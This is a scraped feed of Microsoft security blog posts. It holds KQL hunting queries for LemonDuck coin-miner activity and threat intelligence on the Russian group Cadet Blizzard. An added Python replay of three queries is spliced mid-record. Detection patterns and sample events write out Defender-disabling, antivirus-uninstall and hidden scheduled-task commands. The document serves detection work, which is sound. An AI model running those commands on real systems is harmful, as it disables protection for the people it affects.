To explore up to 30 days worth of raw data to inspect events in your network and locate potential Lemon Duck-related indicators for more than a week, go to the **Advanced Hunting** page > **Query** tab, select the calendar drop-down menu to update your query to hunt for the **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .DOC, .ZIP or .JS, though this could be subject to change as well as the subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for instances of function runs with name \u201cSIEX\u201d, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. 
[Run query in Microsfot 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for simple usage of LemonDuck seen keyword variations initiated by PowerShell processes. All results should reflect Lemon_Duck behavior, however there are existing variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEALWQzUrEQBCE6yz4DiEnF0SfwIP4A6IsguBVQja4wyaTMBN_FsRn97M2u6LeBBl6plPdVV2dczV6VlDNe6uk3lnmXIA3ihrJ97WnNxV60RIsEYWuqAWqQZXvqMcfCpegLfmcjs6cE71zl-h0nnkE-kqUf5xwRt5xKmoL3bjnk7kEyXrgbjkH6A_mLfQEd_w2p9QhEXceW1RWO7yeNAqY0foZ_gbbdByD9a6MVqw8IfjvlZr922ZRa292bWSwdrbz9eSswkNlv1_fw5Rn-mp2SvaxZTTGt_2n3inonkj05gmf4y1R6akXuvulNNMH1HgRaFYCAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName =~ \"wmic.exe\" \n| where InitiatingProcessCommandLine has_all(\"product where\",\"name like\",\"call uninstall\",\"/nointeractive\") \n| where InitiatingProcessCommandLine has_any(\"Kaspersky\",\"avast\",\"avp\",\"security\",\"eset\",\"AntiVirus\",\"Norton Security\")`\n\n**Known LemonDuck component script installations**\n\nLooks for instances of the callback actions which attempt to obfuscate detection while downloading supporting scripts such as those that enable the \u201cKiller\u201d and \u201cInfection\u201d functions for the malware as well as the mining components and potential secondary functions. Options for more specific instances included to account for environments with potential false positives. Most general versions are intended to account for minor script or component changes such as changing to utilize non .bin files, and non-common components. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAN2QzWrCUBCFz1roO1xctSC60p2rVlEQ8Q0kJrYJJlGS-Ac-vN8dA9rgwm3LMHcm58zPmXxprYMShcSFCm0tK7ER-Fq5KvI3tXSR01ExWIE7TeES2ESBvbl-GhPGoCn5nIrMenyV07va2lF3tFmlzUyxLvGEt9XBQ3qiB-zjqYpXdHySZ1gAF2lmNb43Bim15PXbvaoePQ4uhNuSVcw513oiU5xTvwdNNaxxr7LfqEmJAV-RaQpq9qZjR3_Fjoltj-0yB1Pw-gv__j2e62pluu7X_Z_bNsy83-eRRN8NJNPg1z-4At8RQUloAwAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName in (\"powershell.exe\",\"cmd.exe\") \n| where InitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\".bin\") or \nInitiatingProcessCommandLine has_all(\"/c echo try\",\"down_url=\",\"md5\",\"downloaddata\",\"ComputeHash\",\"kr.bin\",\"if.bin\",\"m6.bin\")`\n\n**LemonDuck named scheduled creation**\n\nLooks for instances of the LemonDuck creates statically named scheduled tasks or a semi-unique pattern of task creation LemonDuck also utilizes launching hidden PowerShell processes in conjunction with randomly generated task names. An example of a randomly generated one is: "schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV\\2IVLzNXfZV/F /tr "powershell -w hidden -c PS_CMD". 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWS0WrCQBBF77PgPyx5UrD6BX3S-mRLwQ8o2ygoGpXdtGlB_PaenSQlFV-kLLO53Jmde3eyM631qa1yvq8KOhqKrCf4tQ4qwX31dJZTpQ1cIJzmnNqDXuRVGPOoC3tGfU5dCR-1I8Zkv4jsZp-_qlNwwfIor7RA42BVG-s2oMeE2nTSo5B6Dv_d9c3476Z7CXZ6526e8zuQB-_Jja7yH-bAX2WCTcybM4duYE8O73WUNG_dt9YKqNc44jxarvjNpj_Q4gKlrsMWzztsaPCJ2spmGG2WyYPTA1xytsXpyt5E4nKb8hKvUz1rZvf9AWK9PVhOAgAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where FileName =~ \"schtasks.exe\" \n| where ProcessCommandLine has(\"/create\") \n| where ProcessCommandLine has_any(\"/tn blackball\",\"/tn blutea\",\"/tn rtsa\") or \nProcessCommandLine has_all(\"/create\",\"/ru\",\"system\",\"/sc\",\"/mo\",\"/tn\",\"/F\",\"/tr\",\"powershell -w hidden -c PS_CMD\")`\n\n**Competition killer script scheduled task execution**\n\nLooks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based off historical versions from 2018 and earlier, which has grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJWRT0_CQBDF35nE79D0BAkRDhw4oBeqCQbUxD_XBguxhlpMW8EaP7y_HQppiATMZmZnZt_MvLwNNNdKb4q475VpaVHOuaI-V6qC-EwN_cjTWjG1DPP20EPid86UjpnGTEwNFVPJFeITTlM-WUS1sPoCOwf3hflqYx0FxAlW1GqPut3F1_jWjlGuz2pvxs5v2-myBVHIq5vTPIlri84XlfigpskIxHaX41mYJrMKteX5zMTEmLj9F5jjk-FLWCTW8woyhsuGU3gip7-U_8-E-g-ksHE_MOHOyTeKPtDnuJZVfme8I2Pt6YZ4hXl60gdzp7V_WaKyf4DjYXUuTZ-euqbSMS0Hhu6D_gUG3Q8GqgIAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where ProcessCommandLine has_all(\"schtasks.exe\",\"/Delete\",\"/TN\",\"/F\") \n| summarize make_set(ProcessCommandLine) by DeviceId \n| extend DeleteVolume = array_length(set_ProcessCommandLine) \n| where set_ProcessCommandLine has_any(\"Mysa\",\"Sorry\",\"Oracle Java Update\",\"ok\") where DeleteVolume >= 40 and DeleteVolume <= 80`\n\n**LemonDuck hosts file adjustment for dynamic C2 downloads**\n\nLooks for a PowerShell event wherein LemonDuck will attempt to simultaneously retrieve the IP address of a C2 and modify the hosts file with the retrieved address. The address is then attributed to a name that does not exist and is randomly generated. The script then instructs the machine to download data from the address. This query has a more general and more specific version, allowing the detection of this technique if other activity groups were to utilize it. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAMWQuwrCYAyFzyz4DqWTgvgGDmK9gYigu5S22IK20op18OH9Erro4OAiIZc_OTknbaRMdxVKyDvVqrxqsDn9TKVu1H319FSgVjm9Gg-0ZlYwLRR7LHX6YFjQPVNvQVx8Z4IFCnUF1TpT44xnbEx-4OGPajPqCxYzS7VxjG3mdBodiaYygH9J_6YV-IY8BZ26irFYDDXCDZN0dd5hbTaE0y6s2PnHXWv432cHNvZs1J3-9_vtHfn_L9Gt0E952_Wxf90Lt1_r6hICAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"etc\",\"hosts\") \nor InitiatingProcessCommandLine has_all(\"GetHostAddresses\",\"IPAddressToString\",\"etc\",\"hosts\",\"DownloadData\")`\n\n \n\n[Learn how your organization can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>).\n\n \n\nThe post [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T19:00:59", "type": "mssecure", "title": "When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
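The hunting queries above can be exercised offline with this added Python replay (not code from the Microsoft post): it approximates KQL `has`/`has_all`/`has_any` term matching and runs the Defender-tampering, named-scheduled-task and competition-killer rules over constructed sample DeviceProcessEvents-style records, whose field names follow the KQL above and whose command lines are constructed for the test.

```python
"""Replay three of the LemonDuck advanced-hunting rules over constructed
DeviceProcessEvents-style records. Added example, not code from the
Microsoft post; the sample events below are constructed, not real telemetry."""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Sequence

_TERM = re.compile(r"[a-z0-9_]+")


def terms(text: str) -> List[str]:
    """Case-insensitive tokenisation: runs of letters, digits and underscores."""
    return _TERM.findall(text.lower())


def has(text: str, phrase: str) -> bool:
    """Approximation of KQL `has`: every term of the phrase occurs in the text,
    consecutively and as whole terms, so "/tn" matches "/tn" but not "/tnx"."""
    t, p = terms(text), terms(phrase)
    if not p:
        return False
    return any(t[i:i + len(p)] == p for i in range(len(t) - len(p) + 1))


def has_all(text: str, phrases: Sequence[str]) -> bool:
    return all(has(text, p) for p in phrases)


def has_any(text: str, phrases: Sequence[str]) -> bool:
    return any(has(text, p) for p in phrases)


def defender_tampering(events: Iterable[dict]) -> List[str]:
    """'LemonDuck Microsoft Defender tampering' rule: DeviceIds whose initiating
    command line carries all four Defender-preference terms."""
    needles = ("Set-MpPreference", "DisableRealtimeMonitoring",
               "Add-MpPreference", "ExclusionProcess")
    return [e["DeviceId"] for e in events
            if has_all(e["InitiatingProcessCommandLine"], needles)]


def schtasks_persistence(events: Iterable[dict]) -> List[str]:
    """'LemonDuck named scheduled task creation' rule: schtasks.exe /create with
    a known static task name, or the full hidden-PowerShell creation pattern."""
    hits = []
    for e in events:
        cmd = e["ProcessCommandLine"]
        if e["FileName"].lower() != "schtasks.exe" or not has(cmd, "/create"):
            continue
        static = has_any(cmd, ("/tn blackball", "/tn blutea", "/tn rtsa"))
        pattern = has_all(cmd, ("/create", "/ru", "system", "/sc", "/mo", "/tn",
                                "/F", "/tr", "powershell -w hidden -c PS_CMD"))
        if static or pattern:
            hits.append(cmd)
    return hits


def competition_killer(events: Iterable[dict], low: int = 40, high: int = 80) -> Dict[str, int]:
    """'Competition killer script' rule: per device, the set of distinct
    schtasks /Delete command lines (KQL make_set), flagged when its size lies
    within [low, high] and at least one entry names a known competitor."""
    per_device: Dict[str, set] = defaultdict(set)
    for e in events:
        if has_all(e["ProcessCommandLine"], ("schtasks.exe", "/Delete", "/TN", "/F")):
            per_device[e["DeviceId"]].add(e["ProcessCommandLine"])
    competitors = ("Mysa", "Sorry", "Oracle Java Update", "ok")
    return {dev: len(cmds) for dev, cmds in per_device.items()
            if low <= len(cmds) <= high
            and any(has_any(c, competitors) for c in cmds)}


def _event(device, file_name, cmd, parent_cmd=""):
    return {"DeviceId": device, "FileName": file_name, "ProcessCommandLine": cmd,
            "InitiatingProcessCommandLine": parent_cmd}


# Constructed sample telemetry (not real data): host-a shows the Defender
# tampering and hidden-task patterns, host-b a 42-task killer run containing
# one competitor name, host-c a single benign task deletion.
SAMPLE_EVENTS = [
    _event("host-a", "powershell.exe", "powershell -w hidden -c PS_CMD",
           'powershell Set-MpPreference -DisableRealtimeMonitoring $true; '
           'Add-MpPreference -ExclusionProcess "C:\\"'),
    _event("host-a", "schtasks.exe",
           'schtasks.exe /create /ru system /sc MINUTE /mo 60 /tn fs5yDs9ArkV /F '
           '/tr "powershell -w hidden -c PS_CMD"'),
    _event("host-a", "schtasks.exe", "schtasks.exe /create /tn blackball /tr calc.exe"),
    _event("host-a", "powershell.exe", "powershell Get-MpPreference", "powershell Get-MpPreference"),
    _event("host-c", "schtasks.exe", 'schtasks.exe /Delete /TN "nightly-backup" /F'),
] + [
    _event("host-b", "schtasks.exe", f'schtasks.exe /Delete /TN "job{i}" /F') for i in range(41)
] + [
    _event("host-b", "schtasks.exe", "schtasks.exe /Delete /TN Mysa /F"),
]

if __name__ == "__main__":
    print(defender_tampering(SAMPLE_EVENTS))    # ['host-a']
    print(schtasks_persistence(SAMPLE_EVENTS))  # the two host-a /create command lines
    print(competition_killer(SAMPLE_EVENTS))    # {'host-b': 42}
```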
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T15:26:13", "description": "As Russia\u2019s invasion of Ukraine continues into its second year and Microsoft continues to collaborate with global partners in response, the exposure of destructive cyber capabilities and information operations provide greater clarity into the tools and techniques used by Russian state-sponsored threat actors. Throughout the conflict, Russian threat actors have deployed a variety of destructive capabilities with varying levels of sophistication and impact, which showcase how malicious actors rapidly implement novel techniques during a hybrid war, along with the practical limitations of executing destructive campaigns when significant operational errors are made and the security community rallies around defense. 
These insights help security researchers continuously refine detection and mitigation capabilities to defend against such attacks as they evolve in a wartime environment.\n\nToday, Microsoft Threat Intelligence is sharing updated details about techniques of a threat actor formerly tracked as [DEV-0586](<https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/>)\u2014a distinct Russian state-sponsored threat actor that has now been elevated to the name Cadet Blizzard. As a result of our investigation into their intrusion activity over the past year, we have gained high confidence in our analysis and knowledge of the actor\u2019s tooling, victimology, and motivation, meeting the criteria to convert this group to a [named threat actor](<https://www.microsoft.com/security/blog/2023/04/18/microsoft-shifts-to-a-new-threat-actor-naming-taxonomy/>). \n\nMicrosoft assesses that Cadet Blizzard operations are [associated with the Russian General Staff Main Intelligence Directorate (GRU)](<https://blogs.microsoft.com/on-the-issues/2023/06/14/russian-cyberattacks-ukraine-cadet-blizzard/>) but are separate from other known and more established GRU-affiliated groups such as Forest Blizzard (STRONTIUM) and Seashell Blizzard (IRIDIUM). While Microsoft constantly tracks a number of activity groups with varying degrees of Russian government affiliation, the emergence of a novel GRU affiliated actor, particularly one which has conducted destructive cyber operations likely supporting broader military objectives in Ukraine, is a notable development in the Russian cyber threat landscape. A month before Russia invaded Ukraine, Cadet Blizzard foreshadowed future destructive activity when it created and deployed [WhisperGate](<https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/>), a destructive capability that wipes Master Boot Records (MBRs), against Ukrainian government organizations. 
Cadet Blizzard is also linked [to the defacements](<https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>) of several Ukrainian organization websites, as well as multiple operations, including the hack-and-leak forum known as \u201cFree Civilian\u201d.\n\nMicrosoft has tracked Cadet Blizzard since the deployment of WhisperGate in January 2022. We assess that they have been operational in some capacity since at least 2020 and continue to perform network operations through the present. Operationally consistent with the remit and assessed objectives of GRU-led operations throughout Russia\u2019s invasion of Ukraine, Cadet Blizzard has engaged in focused destructive attacks, espionage, and information operations in regionally significant areas. Cadet Blizzard\u2019s operations, though comparatively less prolific in both scale and scope to more established threat actors such as Seashell Blizzard, are structured to deliver impact and frequently run the risk of hampering continuity of network operations and exposing sensitive information through targeted hack-and-leak operations. Primary targeted sectors include government organizations and information technology providers in Ukraine, although organizations in Europe and Latin America have also been targeted.\n\nMicrosoft has been [working with CERT-UA](<https://blogs.microsoft.com/on-the-issues/2022/11/03/our-tech-support-ukraine/#:~:text=Since%20the%20war%20began%20in%20February%2C%20Microsoft%20and,critical%20Ukrainian%20services%20through%20data%20centers%20across%20Europe.>) closely since the beginning of Russia\u2019s war in Ukraine and continues to support the country and neighboring states in protecting against cyberattacks, such as the ones carried out by Cadet Blizzard. 
As with any observed nation-state actor activity, Microsoft directly and proactively notifies customers that have been targeted or compromised, providing them with the information they need to guide their investigations. Microsoft is also actively working with members of the global security community and other strategic partners to share information that can address this evolving threat through multiple channels. Having elevated this activity to a distinct threat actor name, we\u2019re sharing this information with the larger security community to provide insights to protect and mitigate Cadet Blizzard as a threat. Organizations should actively take steps to protect environments against Cadet Blizzard, and this blog further aims to discuss how to detect and prevent disruption.\n\n## Who is Cadet Blizzard?\n\nCadet Blizzard is a Russian GRU-sponsored threat group that Microsoft began tracking following disruptive and destructive events occurring at multiple government agencies in Ukraine in mid-January 2022. During this time, Russian troops backed with tanks and artillery were surrounding the Ukrainian border as the military prepped for an offensive attack. The [defacements](<https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>) of key Ukrainian institutions\u2019 websites, coupled with the WhisperGate malware, prefaced [multiple waves of attacks](<https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd>) by Seashell Blizzard that followed when the Russian military began their ground offensive a month later.\n\nCadet Blizzard compromises and maintains a foothold on affected networks for months, often exfiltrating data prior to disruptive actions. Microsoft observed Cadet Blizzard\u2019s activity peak between January and June 2022, followed by an extended period of reduced activity. 
The group re-emerged in January 2023 with increased operations against multiple entities in Ukraine and in Europe, including another round of website defacements and a new \u201cFree Civilian\u201d Telegram channel affiliated with the hack-and-leak front under the same name that first emerged in January 2022, around the same time as the initial defacements. Cadet Blizzard actors are active seven days of the week and have conducted their operations during their primary European targets\u2019 off-business hours. Microsoft assesses that NATO member states involved in providing military aid to Ukraine are at greater risk.\n\nFigure 1. A heatmap of the operational cadence of Cadet Blizzard\n\nCadet Blizzard seeks to conduct disruption, destruction, and information collection, using whatever means are available and sometimes acting in a haphazard fashion. While the group carries high risk due to their destructive activity, they appear to operate with a lower degree of operational security than that of longstanding and advanced Russian groups such as Seashell Blizzard and Forest Blizzard. Additionally, as is the case with other Russian state-sponsored threat groups, Microsoft assesses that at least one Russian private sector organization has materially supported Cadet Blizzard by providing operational support including during the WhisperGate destructive attack.\n\n### Targets\n\nCadet Blizzard\u2019s operations are global in scope but consistently affect regional hotspots in Ukraine, Europe, Central Asia, and, periodically, Latin America. Cadet Blizzard likely prioritizes target networks based on requirements consistent with Russian military or intelligence objectives such as geolocation or perceived impact. 
Cadet Blizzard, consistent with a Russian military-associated threat actor, continues to mainly target Ukraine, although the relative scope of impact of Cadet Blizzard\u2019s destructive activity is minimal compared to the multiple waves of destructive attacks that we attribute to Seashell Blizzard. In January 2022, Cadet Blizzard launched destructive attacks in Ukraine in the following industry verticals:\n\n * Government services\n * Law enforcement\n * Non-profit/non-governmental organization\n * IT service providers/consulting\n * Emergency services\n\nCadet Blizzard has repeatedly targeted information technology providers and software developers that provide services to government organizations using a supply chain \u201ccompromise one, compromise many\u201d technique. The group\u2019s January 2022 compromise of government entities in Ukraine probably were at least in part due to access and information gained during a breach of an information technology provider that often worked with these organizations.\n\nPrior to the war in Ukraine, Cadet Blizzard performed historical compromises of several Eastern European entities as well, primarily affecting the government and technology sectors as early as April 2021. As the war continues, Cadet Blizzard activity poses an increasing risk to the broader European community, specifically any successful attacks against governments and IT service providers, which may give the actor both tactical and strategic-level insight into Western operations and policy surrounding the conflict. 
Gaining heightened levels of access into these targeted sectors may also enable Cadet Blizzard to carry out retaliatory demonstrations in opposition to the West\u2019s support for Ukraine.\n\n### Tools, tactics, and procedures\n\nCadet Blizzard is a conventional network operator and commonly utilizes living-off-the-land techniques after gaining initial access to move laterally through the network, collect credentials and other information, and deploy defense evasion techniques and persistence mechanisms. Unlike other Russian-affiliated groups that historically prefer to remain undetected to perform espionage, the result of at least some notable Cadet Blizzard operations are extremely disruptive and are almost certainly intended to be public signals to their targets to achieve the larger objective of destruction, disruption, and possibly, intimidation.\n\nFigure 2. Cadet Blizzard's normal operational lifecycle\n\n**Initial access**\n\nCadet Blizzard predominantly achieves initial access through exploitation of web servers commonly found on network perimeters and DMZs. Cadet Blizzard is also known for exploiting Confluence servers through the CVE-2021-26084 vulnerability, Exchange servers through multiple vulnerabilities including CVE-2022-41040 and ProxyShell, and likely commodity vulnerabilities in various open-source platforms such as content management systems.\n\n**Persistence**\n\nCadet Blizzard frequently persists on target networks through the deployment of commodity web shells used either for commanding or tunneling. 
Commonly utilized web shells include [P0wnyshell](<https://github.com/flozz/p0wny-shell>), [reGeorg](<https://github.com/sensepost/reGeorg>), PAS, and even custom variants included in publicly available exploit kits.\n\nIn February 2023, [CERT-UA reported](<https://cert.gov.ua/article/3947787>) an attempted attack against a Ukrainian state information system that involved a variant of the PAS web shell, which Microsoft assesses to be unique to Cadet Blizzard operations at the time of the intrusion.\n\n**Privilege escalation and credential harvesting** \nCadet Blizzard has leveraged a variety of living-off-the-land techniques to conduct privilege escalation and harvesting of credentials.\n\n * Dumping LSASS \u2013 Cadet Blizzard uses Sysinternals tools such as _procdump_ to dump LSASS in suspected offline credential harvesting efforts. Cadet Blizzard frequently renames _procdump64_ to alternative names, such as _dump64.exe_.\n * Dumping registry hives \u2013 Cadet Blizzard extracts registry hives using native means via _reg save_.\n\n**Lateral movement** \nCadet Blizzard conducts lateral movement with valid network credentials obtained from credential harvesting. To conduct lateral movement more efficiently, Cadet Blizzard typically uses modules from the publicly available [Impacket framework](<https://github.com/fortra/impacket>). While this framework is generically utilized by multiple actors, preferential execution of patterns of commands may allow for more precision profiling of Cadet Blizzard operations:\n\n * PowerShell _get-volume_ to enumerate the volume of a device\nFigure 3. PowerShell _get-volume_ command\n\n * Copying critical registry hives that contain password hashes and computer information\nFigure 4. Copying critical registry hives\n\n * Downloading files directly from actor-owned infrastructure via the PowerShell _DownloadFile_ commandlet\nFigure 5. 
PowerShell _DownloadFile_ commandlet\n\n**Command execution and C2**\n\nCadet Blizzard periodically uses generic socket-based tunneling utilities to facilitate command and control (C2) to actor-controlled infrastructure. Payloads such as NetCat and Go Simple Tunnel (GOST) are commonly renamed to blend into the operating system but are used to shovel interactive command prompts over established sockets. Frequently, remote command execution may be facilitated through remotely scheduled tasks. The group has also sparingly utilized Meterpreter.\n\nFigure 6. Scheduled task creating a reverse shell\n\n**Operational security**\n\nCadet Blizzard utilizes anonymization services IVPN, SurfShark, and Tor as their anonymization layer during select operations.\n\n**Anti-forensics** \nCadet Blizzard has been observed leveraging the _Win32_NTEventlogFile_ commandlet in PowerShell to extract both system and security event logs to an operational directory. The activities are anticipated to be consistent with anti-forensics activities.\n\n * Common file targets during extraction are:\n * _sec.evtx_\n * _sys.evtx_\n * Cadet Blizzard commonly deletes files used during operational phases seen in lateral movement.\n * Cadet Blizzard malware implants are known to disable Microsoft Defender Antivirus through a variety of means:\n * _NirSoft AdvancedRun_ utility, which is used to disable Microsoft Defender Antivirus by stopping the _WinDefend_ service.\n * _Disable Windows Defender.bat,_ which presumably disables Microsoft Defender Antivirus via the registry.\nFigure 7. Addition of registry key to disable Microsoft Defender Antivirus\n\n**Impact assessment**\n\nCadet Blizzard typically collects information en-masse from targeted servers. If mail servers are affected, Cadet Blizzard typically attempts to collect mail, placing incident response communications at risk. 
Credential material (such as SSH keys) are also a common target to provide methods for re-entry if a full remediation does not occur. As was the case with the WhisperGate operation in January 2022, Cadet Blizzard is known to deploy destructive malware to select target environments to delete data and render systems inoperable.\n\nAlso in January of 2022, Microsoft identified that data exfiltrated by Cadet Blizzard in compromises of various Ukrainian organizations was leaked on a Tor .onion site under the name \u201cFree Civilian.\u201d The organizations from which data was leaked strongly correlated to multiple Cadet Blizzard compromises earlier in 2022, leading Microsoft to assess that this forum is almost certainly linked to Cadet Blizzard. In February 2023, a new Telegram channel was established under the same \u201cFree Civilian\u201d moniker, suggesting that Cadet Blizzard intends to continue conducting information operations in the second year of the war. However, the public channel only has 1.3K followers with posts getting at most a dozen reactions as of the time of publication, signifying low user interaction. A private channel assumed to be operated by the same group appears to have shared data with 748 of those subscribers.\n\nFigure 8. Free Civilian hack-and-leak front\n\n### Related ecosystems\n\nCadet Blizzard operations do not occur in a silo; there have been substantial technical indicators of intersection with other malicious cyber activity that may have a broader scope or a nexus outside of Russia. They have at times utilized services associated with these ecosystems such as Storm-0587, discussed below, as well as having support from at least one private sector enabler organization within Russia. 
